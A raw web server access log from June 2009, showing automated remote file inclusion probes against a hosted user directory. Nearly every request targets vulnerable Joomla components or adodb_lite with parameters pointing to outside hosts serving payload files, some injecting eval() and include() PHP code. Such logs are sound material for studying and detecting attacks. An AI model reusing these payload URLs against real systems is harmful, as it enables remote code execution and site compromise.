124.0.139.129 - - [24/Jun/2009:07:14:42 -0700] "GET /~t290/logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [24/Jun/2009:07:14:42 -0700] "GET /~t290/logs/access.log.0%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [24/Jun/2009:07:14:43 -0700] "GET /~t290///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [24/Jun/2009:07:52:35 -0700] "GET /~t290/logs/access.log.0%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [24/Jun/2009:07:52:35 -0700] "GET /~t290///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [24/Jun/2009:07:52:35 -0700] "GET /~t290/logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
72.249.86.219 - - [24/Jun/2009:08:02:48 -0700] "GET /~t290/logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://webmail.visaotur.com.br/novo/bin/copyright.txt???? HTTP/1.1" 404 332 /home/users/t/t290/public_html/logs/components "-" "Mozilla/5.0" 0 web.hypersurf.com
72.249.86.219 - - [24/Jun/2009:08:02:48 -0700] "GET /~t290/logs/access.log.0%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://webmail.visaotur.com.br/novo/bin/copyright.txt???? HTTP/1.1" 404 347 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.249.86.219 - - [24/Jun/2009:08:02:48 -0700] "GET /~t290/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://webmail.visaotur.com.br/novo/bin/copyright.txt???? HTTP/1.1" 404 327 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.80.27 - - [24/Jun/2009:08:06:05 -0700] "GET /~t290/logs//components/com_flyspray/startdown.php?file=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 329 /home/users/t/t290/public_html/logs//components "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.80.27 - - [24/Jun/2009:08:06:05 -0700] "GET /~t290/logs/access.log.0%20%20//components/com_flyspray/startdown.php?file=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.80.27 - - [24/Jun/2009:08:06:05 -0700] "GET /~t290//components/com_flyspray/startdown.php?file=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 324 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.80.27 - - [24/Jun/2009:08:06:05 -0700] "GET /~t290//components/com_flyspray/startdown.php?file=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 324 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.80.27 - - [24/Jun/2009:08:06:05 -0700] "GET /~t290/logs//components/com_flyspray/startdown.php?file=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 329 /home/users/t/t290/public_html/logs//components "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.80.27 - - [24/Jun/2009:08:06:06 -0700] "GET /~t290/logs/access.log.0%20%20//components/com_flyspray/startdown.php?file=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.80.27 - - [24/Jun/2009:08:06:07 -0700] "GET /~t290//components/com_flyspray/startdown.php?file=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 324 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.80.27 - - [24/Jun/2009:08:06:07 -0700] "GET /~t290/logs//components/com_flyspray/startdown.php?file=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 329 /home/users/t/t290/public_html/logs//components "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.80.27 - - [24/Jun/2009:08:06:07 -0700] "GET /~t290/logs/access.log.0//components/com_flyspray/startdown.php?file=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.80.27 - - [24/Jun/2009:08:06:12 -0700] "GET /~t290//components/com_flyspray/startdown.php?file=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 324 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.80.27 - - [24/Jun/2009:08:06:12 -0700] "GET /~t290/logs/access.log.0//components/com_flyspray/startdown.php?file=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.80.27 - - [24/Jun/2009:08:06:12 -0700] "GET /~t290/logs//components/com_flyspray/startdown.php?file=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 329 /home/users/t/t290/public_html/logs//components "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [24/Jun/2009:08:09:24 -0700] "GET /~t290/logs/access.log.0///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.249.86.219 - - [24/Jun/2009:08:11:20 -0700] "GET /~t290/logs/access.log.0/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://webmail.visaotur.com.br/novo/bin/copyright.txt???? HTTP/1.1" 404 345 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
200.241.55.7 - - [24/Jun/2009:08:15:19 -0700] "GET /~t290/logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://webmail.visaotur.com.br/novo/bin/copyright.txt???? HTTP/1.1" 404 332 /home/users/t/t290/public_html/logs/components "-" "Mozilla/5.0" 0 web.hypersurf.com
200.241.55.7 - - [24/Jun/2009:08:15:19 -0700] "GET /~t290/logs/access.log.0%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://webmail.visaotur.com.br/novo/bin/copyright.txt???? HTTP/1.1" 404 347 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
200.241.55.7 - - [24/Jun/2009:08:15:19 -0700] "GET /~t290/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://webmail.visaotur.com.br/novo/bin/copyright.txt???? HTTP/1.1" 404 327 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
83.98.209.71 - - [24/Jun/2009:08:16:50 -0700] "GET /~t290/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 326 /home/users/t/t290/public_html/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
83.98.209.71 - - [24/Jun/2009:08:16:50 -0700] "GET /~t290/logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
83.98.209.71 - - [24/Jun/2009:08:16:50 -0700] "GET /~t290/logs/access.log.0%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 346 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
83.98.209.71 - - [24/Jun/2009:08:18:08 -0700] "GET /~t290/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///components "-" "Mozilla/5.0" 0 web.hypersurf.com
83.98.209.71 - - [24/Jun/2009:08:18:08 -0700] "GET /~t290///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 338 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
83.98.209.71 - - [24/Jun/2009:08:18:08 -0700] "GET /~t290/logs/access.log.0%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:18:40 -0700] "GET /~t290/logs/access.log.0%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:18:40 -0700] "GET /~t290/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///components "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:18:40 -0700] "GET /~t290///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 338 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:18:44 -0700] "GET /~t290///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 338 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:18:44 -0700] "GET /~t290/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///components "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:18:44 -0700] "GET /~t290/logs/access.log.0%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:19:04 -0700] "GET /~t290/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///components "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:19:04 -0700] "GET /~t290/logs/access.log.0///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:19:04 -0700] "GET /~t290///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 338 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:19:04 -0700] "GET /~t290/logs/access.log.0///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:19:04 -0700] "GET /~t290/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///components "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:19:04 -0700] "GET /~t290///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 338 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.231 - - [24/Jun/2009:08:22:32 -0700] "GET /~t290/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///components "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.231 - - [24/Jun/2009:08:22:33 -0700] "GET /~t290/logs/access.log.0%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.231 - - [24/Jun/2009:08:22:33 -0700] "GET /~t290///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
216.139.67.116 - - [24/Jun/2009:08:23:41 -0700] "GET /~t290/logs/access.log.0%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
216.139.67.116 - - [24/Jun/2009:08:23:42 -0700] "GET /~t290///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 338 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
216.139.67.116 - - [24/Jun/2009:08:23:42 -0700] "GET /~t290/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///components "-" "Mozilla/5.0" 0 web.hypersurf.com
83.98.209.71 - - [24/Jun/2009:08:23:50 -0700] "GET /~t290/logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.look22.de/cfg?? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/lib "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" 0 web.hypersurf.com
83.98.209.71 - - [24/Jun/2009:08:23:50 -0700] "GET /~t290/logs/access.log.0/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.look22.de/cfg?? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" 0 web.hypersurf.com
83.98.209.71 - - [24/Jun/2009:08:23:53 -0700] "GET /~t290/logs/access.log.0/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.look22.de/cfg?? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 0 web.hypersurf.com
83.98.209.71 - - [24/Jun/2009:08:23:53 -0700] "GET /~t290/logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.look22.de/cfg?? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/lib "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:25:15 -0700] "GET /~t290///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:25:15 -0700] "GET /~t290/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///components "-" "Mozilla/5.0" 0 web.hypersurf.com
123.143.98.5 - - [24/Jun/2009:08:25:15 -0700] "GET /~t290/logs/access.log.0%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.231 - - [24/Jun/2009:08:25:23 -0700] "GET /~t290/logs/access.log.0///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
200.241.55.7 - - [24/Jun/2009:08:26:03 -0700] "GET /~t290/logs/access.log.0/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://webmail.visaotur.com.br/novo/bin/copyright.txt???? HTTP/1.1" 404 345 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:08:38:20 -0700] "GET /~t290/logs/access.log.0%20%20///?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 308 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:08:38:20 -0700] "GET /~t290///?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 904 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:08:38:20 -0700] "GET /~t290/logs///?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 12399 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
211.206.120.187 - - [24/Jun/2009:08:39:03 -0700] "GET /~t290/logs///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 12399 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
211.206.120.187 - - [24/Jun/2009:08:39:03 -0700] "GET /~t290///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 904 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
211.206.120.187 - - [24/Jun/2009:08:39:03 -0700] "GET /~t290/logs/access.log.0///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
87.230.22.39 - - [24/Jun/2009:08:41:23 -0700] "GET /~t290/logs/access.log.0/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
87.230.22.39 - - [24/Jun/2009:08:41:23 -0700] "GET /~t290/logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
87.230.22.39 - - [24/Jun/2009:08:41:23 -0700] "GET /~t290/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 326 /home/users/t/t290/public_html/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
87.230.22.39 - - [24/Jun/2009:08:41:56 -0700] "GET /~t290/logs/access.log.0%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 346 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:08:43:53 -0700] "GET /~t290/logs/access.log.0///?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:08:44:05 -0700] "GET /~t290/logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:08:44:05 -0700] "GET /~t290/logs/access.log.0/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:08:44:05 -0700] "GET /~t290/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 326 /home/users/t/t290/public_html/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:08:44:55 -0700] "GET /~t290/logs/access.log.0%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 346 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
110.45.144.33 - - [24/Jun/2009:09:17:01 -0700] "GET /~t290/logs/access.log.0//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 376 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.79" 0 web.hypersurf.com
110.45.144.33 - - [24/Jun/2009:09:17:02 -0700] "GET /~t290/logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 363 /home/users/t/t290/public_html/logs//administrator "-" "libwww-perl/5.79" 0 web.hypersurf.com
110.45.144.33 - - [24/Jun/2009:09:17:15 -0700] "GET /~t290/logs/access.log.0//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 376 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.79" 0 web.hypersurf.com
110.45.144.33 - - [24/Jun/2009:09:17:16 -0700] "GET /~t290/logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 363 /home/users/t/t290/public_html/logs//administrator "-" "libwww-perl/5.79" 0 web.hypersurf.com
110.45.144.89 - - [24/Jun/2009:09:20:26 -0700] "GET /~t290/logs/access.log.0//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 376 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.79" 0 web.hypersurf.com
110.45.144.89 - - [24/Jun/2009:09:20:27 -0700] "GET /~t290/logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 363 /home/users/t/t290/public_html/logs//administrator "-" "libwww-perl/5.79" 0 web.hypersurf.com
211.206.120.187 - - [24/Jun/2009:09:21:15 -0700] "GET /~t290/logs/access.log.0///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
211.206.120.187 - - [24/Jun/2009:09:21:15 -0700] "GET /~t290/logs///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 12399 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
211.206.120.187 - - [24/Jun/2009:09:21:15 -0700] "GET /~t290///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 904 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
110.45.144.107 - - [24/Jun/2009:09:23:03 -0700] "GET /~t290/logs/access.log.0//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 376 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.79" 0 web.hypersurf.com
